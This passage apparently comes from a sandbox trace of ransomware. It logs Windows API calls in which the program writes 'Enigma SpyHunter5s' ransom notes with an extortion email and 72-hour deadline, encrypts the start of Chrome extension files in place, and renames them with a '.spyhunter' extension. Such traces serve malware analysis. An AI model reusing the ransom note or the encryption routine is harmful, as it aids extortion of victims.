data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json") returned 164 [0157.380] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.380] GetProcessHeap () returned 0x2c0000 [0157.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.380] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eab4*=0x2800, lpOverlapped=0x0) returned 1 [0157.469] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.469] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eab4*=0x2800, lpOverlapped=0x0) returned 1 [0157.469] GetProcessHeap () returned 0x2c0000 [0157.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.469] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.469] WriteFile (in: hFile=0x178, lpBuffer=0x270eaf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eab4, lpOverlapped=0x0 | out: lpBuffer=0x270eaf4*, lpNumberOfBytesWritten=0x270eab4*=0x4, lpOverlapped=0x0) returned 1 [0157.707] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eab4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eab4*=0x30, lpOverlapped=0x0) returned 1 [0157.707] CloseHandle (hObject=0x178) returned 1 [0157.707] GetProcessHeap () returned 0x2c0000 [0157.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.707] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.spyhunter") returned 174 [0157.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0157.708] GetProcessHeap () returned 0x2c0000 [0157.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.718] GetProcessHeap () returned 0x2c0000 [0157.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.718] GetProcessHeap () returned 0x2c0000 [0157.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24fe8 | out: hHeap=0x2c0000) returned 1 [0157.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.719] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.719] WriteFile (in: hFile=0x178, lpBuffer=0x270ea2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb54, lpOverlapped=0x0 | out: lpBuffer=0x270ea2b*, lpNumberOfBytesWritten=0x270eb54*=0x127, lpOverlapped=0x0) returned 1 [0157.720] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.720] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb54*=0x2ac, lpOverlapped=0x0) returned 1 [0157.720] CloseHandle (hObject=0x178) returned 1 [0157.720] GetProcessHeap () returned 0x2c0000 [0157.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21b10 | out: hHeap=0x2c0000) returned 1 [0157.721] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eaf0 | out: pbBuffer=0x270eaf0) returned 1 [0157.721] GetProcessHeap () returned 0x2c0000 [0157.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.721] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eae8*=0x30) returned 1 [0157.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0157.722] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.722] GetProcessHeap () returned 0x2c0000 [0157.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.722] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eaac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eaac*=0x2800, lpOverlapped=0x0) returned 1 [0157.743] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.744] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eaac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eaac*=0x2800, lpOverlapped=0x0) returned 1 [0157.744] GetProcessHeap () returned 0x2c0000 [0157.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.744] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.744] WriteFile (in: hFile=0x178, lpBuffer=0x270eaec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eaac, lpOverlapped=0x0 | out: lpBuffer=0x270eaec*, lpNumberOfBytesWritten=0x270eaac*=0x4, lpOverlapped=0x0) returned 1 [0157.763] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eaac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eaac*=0x30, lpOverlapped=0x0) returned 1 [0157.763] CloseHandle (hObject=0x178) returned 1 [0157.764] GetProcessHeap () returned 0x2c0000 [0157.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.764] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.spyhunter") returned 174 [0157.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0157.765] GetProcessHeap () returned 0x2c0000 [0157.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.765] GetProcessHeap () returned 0x2c0000 [0157.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.765] GetProcessHeap () returned 0x2c0000 [0157.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21978 | out: hHeap=0x2c0000) returned 1 [0157.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.767] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.767] WriteFile (in: hFile=0x178, lpBuffer=0x270ea23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb4c, lpOverlapped=0x0 | out: lpBuffer=0x270ea23*, lpNumberOfBytesWritten=0x270eb4c*=0x127, lpOverlapped=0x0) returned 1 [0157.769] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.769] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb4c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.769] CloseHandle (hObject=0x178) returned 1 [0157.769] GetProcessHeap () returned 0x2c0000 [0157.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cefd18 | out: hHeap=0x2c0000) returned 1 [0157.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eae8 | out: pbBuffer=0x270eae8) returned 1 [0157.770] GetProcessHeap () returned 0x2c0000 [0157.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eae0*=0x30) returned 1 [0157.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.771] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0157.771] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.771] GetProcessHeap () returned 0x2c0000 [0157.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.771] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eaa4*=0x2800, lpOverlapped=0x0) returned 1 [0157.776] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.776] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eaa4*=0x2800, lpOverlapped=0x0) returned 1 [0157.776] GetProcessHeap () returned 0x2c0000 [0157.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.776] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.776] WriteFile (in: hFile=0x178, lpBuffer=0x270eae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eaa4, lpOverlapped=0x0 | out: lpBuffer=0x270eae4*, lpNumberOfBytesWritten=0x270eaa4*=0x4, lpOverlapped=0x0) returned 1 [0157.777] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eaa4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eaa4*=0x30, lpOverlapped=0x0) returned 1 [0157.777] CloseHandle (hObject=0x178) returned 1 [0157.777] GetProcessHeap () returned 0x2c0000 [0157.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.777] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.spyhunter") returned 174 [0157.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.spyhunter")) returned 1 [0157.778] GetProcessHeap () returned 0x2c0000 [0157.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.778] GetProcessHeap () returned 0x2c0000 [0157.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.779] GetProcessHeap () returned 0x2c0000 [0157.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cefb80 | out: hHeap=0x2c0000) returned 1 [0157.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.779] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.780] WriteFile (in: hFile=0x178, lpBuffer=0x270ea1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb44, lpOverlapped=0x0 | out: lpBuffer=0x270ea1b*, lpNumberOfBytesWritten=0x270eb44*=0x127, lpOverlapped=0x0) returned 1 [0157.780] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.780] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb44*=0x2ac, lpOverlapped=0x0) returned 1 [0157.780] CloseHandle (hObject=0x178) returned 1 [0157.781] GetProcessHeap () returned 0x2c0000 [0157.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cef9e8 | out: hHeap=0x2c0000) returned 1 [0157.781] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eae0 | out: pbBuffer=0x270eae0) returned 1 [0157.781] GetProcessHeap () returned 0x2c0000 [0157.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.781] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ead8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ead8*=0x30) returned 1 [0157.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json") returned 164 [0157.782] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.782] GetProcessHeap () returned 0x2c0000 [0157.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.782] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ea9c*=0x2800, lpOverlapped=0x0) returned 1 [0157.803] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.803] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ea9c*=0x2800, lpOverlapped=0x0) returned 1 [0157.804] GetProcessHeap () returned 0x2c0000 [0157.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.804] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.804] WriteFile (in: hFile=0x178, lpBuffer=0x270eadc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x270eadc*, lpNumberOfBytesWritten=0x270ea9c*=0x4, lpOverlapped=0x0) returned 1 [0157.957] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea9c*=0x30, lpOverlapped=0x0) returned 1 [0157.957] CloseHandle (hObject=0x178) returned 1 [0157.957] GetProcessHeap () returned 0x2c0000 [0157.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.958] wnsprintfW (in: 